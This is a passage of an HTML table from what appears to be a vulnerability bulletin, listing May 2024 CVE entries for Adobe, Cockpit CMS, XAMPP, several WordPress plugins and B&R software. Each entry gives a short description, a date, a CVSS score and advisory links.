<td>Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30284&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30284" target="_blank">CVE-2024-30284</a><br><a href="https://helpx.adobe.com/security/products/acrobat/apsb24-29.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Acrobat Reader<br> </td>
<td>Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30310&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30310" target="_blank">CVE-2024-30310</a><br><a href="https://helpx.adobe.com/security/products/acrobat/apsb24-29.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Acrobat Reader<br> </td>
<td>Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34094&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34094" target="_blank">CVE-2024-34094</a><br><a href="https://helpx.adobe.com/security/products/acrobat/apsb24-29.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Acrobat Reader<br> </td>
<td>Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34095&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34095" target="_blank">CVE-2024-34095</a><br><a href="https://helpx.adobe.com/security/products/acrobat/apsb24-29.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Acrobat Reader<br> </td>
<td>Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34096&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34096" target="_blank">CVE-2024-34096</a><br><a href="https://helpx.adobe.com/security/products/acrobat/apsb24-29.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Acrobat Reader<br> </td>
<td>Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34097&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34097" target="_blank">CVE-2024-34097</a><br><a href="https://helpx.adobe.com/security/products/acrobat/apsb24-29.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Acrobat Reader<br> </td>
<td>Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34098&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34098" target="_blank">CVE-2024-34098</a><br><a href="https://helpx.adobe.com/security/products/acrobat/apsb24-29.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Acrobat Reader<br> </td>
<td>Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34099&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34099" target="_blank">CVE-2024-34099</a><br><a href="https://helpx.adobe.com/security/products/acrobat/apsb24-29.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Acrobat Reader<br> </td>
<td>Acrobat Reader versions 20.005.30574, 24.002.20736 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34100&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34100" target="_blank">CVE-2024-34100</a><br><a href="https://helpx.adobe.com/security/products/acrobat/apsb24-29.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Adobe Aero Desktop<br> </td>
<td>Adobe Aero Desktop versions 23.4 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30275&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30275" target="_blank">CVE-2024-30275</a><br><a href="https://helpx.adobe.com/security/products/aero/apsb24-33.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Adobe Framemaker<br> </td>
<td>Adobe Framemaker versions 2020.5, 2022.3 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30288&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30288" target="_blank">CVE-2024-30288</a><br><a href="https://helpx.adobe.com/security/products/framemaker/apsb24-37.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Adobe Framemaker<br> </td>
<td>Adobe Framemaker versions 2020.5, 2022.3 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30289&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30289" target="_blank">CVE-2024-30289</a><br><a href="https://helpx.adobe.com/security/products/framemaker/apsb24-37.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Adobe Framemaker<br> </td>
<td>Adobe Framemaker versions 2020.5, 2022.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30290&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30290" target="_blank">CVE-2024-30290</a><br><a href="https://helpx.adobe.com/security/products/framemaker/apsb24-37.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Adobe Framemaker<br> </td>
<td>Adobe Framemaker versions 2020.5, 2022.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30291&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30291" target="_blank">CVE-2024-30291</a><br><a href="https://helpx.adobe.com/security/products/framemaker/apsb24-37.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Adobe Framemaker<br> </td>
<td>Adobe Framemaker versions 2020.5, 2022.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30292&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30292" target="_blank">CVE-2024-30292</a><br><a href="https://helpx.adobe.com/security/products/framemaker/apsb24-37.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Animate<br> </td>
<td>Animate versions 24.0.2, 23.0.5 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30282&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30282" target="_blank">CVE-2024-30282</a><br><a href="https://helpx.adobe.com/security/products/animate/apsb24-36.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Animate<br> </td>
<td>Animate versions 24.0.2, 23.0.5 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30293&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30293" target="_blank">CVE-2024-30293</a><br><a href="https://helpx.adobe.com/security/products/animate/apsb24-36.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Animate<br> </td>
<td>Animate versions 24.0.2, 23.0.5 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30294&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30294" target="_blank">CVE-2024-30294</a><br><a href="https://helpx.adobe.com/security/products/animate/apsb24-36.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Animate<br> </td>
<td>Animate versions 24.0.2, 23.0.5 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30295&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30295" target="_blank">CVE-2024-30295</a><br><a href="https://helpx.adobe.com/security/products/animate/apsb24-36.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Animate<br> </td>
<td>Animate versions 24.0.2, 23.0.5 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30296&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30296" target="_blank">CVE-2024-30296</a><br><a href="https://helpx.adobe.com/security/products/animate/apsb24-36.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Animate<br> </td>
<td>Animate versions 24.0.2, 23.0.5 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30297&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30297" target="_blank">CVE-2024-30297</a><br><a href="https://helpx.adobe.com/security/products/animate/apsb24-36.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Dreamweaver Desktop<br> </td>
<td>Dreamweaver Desktop versions 21.3 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead in arbitrary code execution by an attacker. Exploitation of this issue does require user interaction.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30314&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">9.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30314" target="_blank">CVE-2024-30314</a><br><a href="https://helpx.adobe.com/security/products/dreamweaver/apsb24-39.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Illustrator<br> </td>
<td>Illustrator versions 28.4, 27.9.3 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-20791&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-20791" target="_blank">CVE-2024-20791</a><br><a href="https://helpx.adobe.com/security/products/illustrator/apsb24-30.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Illustrator<br> </td>
<td>Illustrator versions 28.4, 27.9.3 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-20792&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-20792" target="_blank">CVE-2024-20792</a><br><a href="https://helpx.adobe.com/security/products/illustrator/apsb24-30.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Substance3D - Painter<br> </td>
<td>Substance3D - Painter versions 9.1.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30274&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30274" target="_blank">CVE-2024-30274</a><br><a href="https://helpx.adobe.com/security/products/substance3d_painter/apsb24-31.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Adobe--Substance3D - Painter<br> </td>
<td>Substance3D - Painter versions 9.1.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30307&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30307" target="_blank">CVE-2024-30307</a><br><a href="https://helpx.adobe.com/security/products/substance3d_painter/apsb24-31.html" target="_blank">psirt@adobe.com</a></td>
</tr>
<tr>
<td>Agentejo--Cockpit CMS<br> </td>
<td>A vulnerability has been discovered in Agentejo Cockpit CMS v0.5.5 that consists in an arbitrary file upload in '/media/api' parameter via post request. An attacker could upload files to the server, compromising the entire infrastructure.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4825&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4825" target="_blank">CVE-2024-4825</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/unrestricted-upload-file-dangerous-type-vulnerability-cockpit-cms" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>Apache Friends--XAMPP<br> </td>
<td>Uncontrolled resource consumption vulnerability in XAMPP Windows, versions 7.3.2 and earlier. This vulnerability exists when XAMPP attempts to process many incomplete HTTP requests, resulting in resource consumption and system crashes.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5055&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5055" target="_blank">CVE-2024-5055</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/vulnerability-uncontrolled-resource-consumption-xampp" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>Asaancart--Simple PHP Shopping Cart<br> </td>
<td>SQL injection vulnerability in Simple PHP Shopping Cart affecting version 0.9. This vulnerability could allow an attacker to retrieve all the information stored in the database by sending a specially crafted SQL query, due to the lack of proper sanitisation of the category_id parameter in the category.php file.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4826&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4826" target="_blank">CVE-2024-4826</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-simple-php-shopping-cart" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>Astoundify--Simple Registration for WooCommerce<br> </td>
<td>Improper Privilege Management vulnerability in Astoundify Simple Registration for WooCommerce allows Privilege Escalation.This issue affects Simple Registration for WooCommerce: from n/a through 1.5.6.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32511&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32511" target="_blank">CVE-2024-32511</a><br><a href="https://patchstack.com/database/vulnerability/woocommerce-simple-registration/wordpress-simple-registration-for-woocommerce-plugin-1-5-6-unauthenticated-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Averta--Phlox Portfolio<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Averta Phlox Portfolio allows PHP Local File Inclusion.This issue affects Phlox Portfolio: from n/a through 2.3.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-38399&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L" target="_blank" title="CVSS V3 Score">8.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-38399" target="_blank">CVE-2023-38399</a><br><a href="https://patchstack.com/database/vulnerability/auxin-portfolio/wordpress-phlox-portfolio-plugin-2-3-1-unauthenticated-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Averta--Phlox Shop<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Averta Phlox Shop allows PHP Local File Inclusion.This issue affects Phlox Shop: from n/a through 2.0.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-39163&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L" target="_blank" title="CVSS V3 Score">8.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-39163" target="_blank">CVE-2023-39163</a><br><a href="https://patchstack.com/database/vulnerability/auxin-shop/wordpress-phlox-shop-plugin-2-0-0-unauthenticated-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>B&amp;R Industrial Automation--Automation Studio<br> </td>
<td>Improper DLL loading algorithms in B&amp;R Automation Studio may allow an authenticated local attacker to execute code with elevated privileges. This issue affects Automation Studio versions before 4.12.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2021-22280&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2021-22280" target="_blank">CVE-2021-22280</a><br><a href="https://www.br-automation.com/fileadmin/2021-10_DLL_Hijacking_Vulnerability_in_Automation_Studio-7dd34511.pdf" target="_blank">cybersecurity@ch.abb.com</a></td>
</tr>
<tr>
<td>B&amp;R Industrial Automation--Scene Viewer<br> </td>
<td>An authenticated local attacker who successfully exploited this vulnerability could insert and run arbitrary code using legitimate B&amp;R software's. An Uncontrolled Search Path Element vulnerability in B&amp;R Industrial Automation Scene Viewer, B&amp;R Industrial  Automation Runtime, B&amp;R Industrial Automation mapp Vision, B&amp;R Industrial Automation mapp View, B&amp;R Industrial Automation mapp Cockpit, B&amp;R Industrial Automation mapp Safety, B&amp;R Industrial Automation VC4 could allow an authenticated local attacker to execute malicious code by placing specially crafted files in the loading search path. This issue affects Scene Viewer: before 4.4.0; Automation Runtime: before J4.93; mapp Vision: before 5.26.1; mapp View: before 5.24.2; mapp Cockpit: before 5.24.2; mapp Safety: before 5.24.2; VC4: before 4.73.2.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-2637&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2637" target="_blank">CVE-2024-2637</a><br><a href="https://www.br-automation.com/fileadmin/SA24P005_Insecure_Loading_of_Code-c7d9e49c.pdf" target="_blank">cybersecurity@ch.abb.com</a></td>
</tr>
<tr>
<td>BoldGrid--Total Upkeep<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in BoldGrid Total Upkeep allows Relative Path Traversal.This issue affects Total Upkeep: from n/a through 1.15.8.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-24869&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-24869" target="_blank">CVE-2024-24869</a><br><a href="https://patchstack.com/database/vulnerability/boldgrid-backup/wordpress-total-upkeep-plugin-1-15-8-arbitrary-file-download-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Booking Ultra Pro--Booking Ultra Pro<br> </td>
<td>Improper Privilege Management vulnerability in Booking Ultra Pro allows Privilege Escalation.This issue affects Booking Ultra Pro: from n/a through 1.1.12.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32960&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32960" target="_blank">CVE-2024-32960</a><br><a href="https://patchstack.com/database/vulnerability/booking-ultra-pro/wordpress-booking-ultra-pro-plugin-1-1-12-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Brainstorm Force--ConvertPlus<br> </td>
<td>The ConvertPlus plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.5.26 via deserialization of untrusted input from the 'settings_encoded' attribute of the 'smile_modal' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4838&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4838" target="_blank">CVE-2024-4838</a><br><a href="https://www.convertplug.com/plus/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/16f5a104-dce0-4249-91b9-67f99cce16d3?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>Brainstorm Force--Spectra Pro<br> </td>
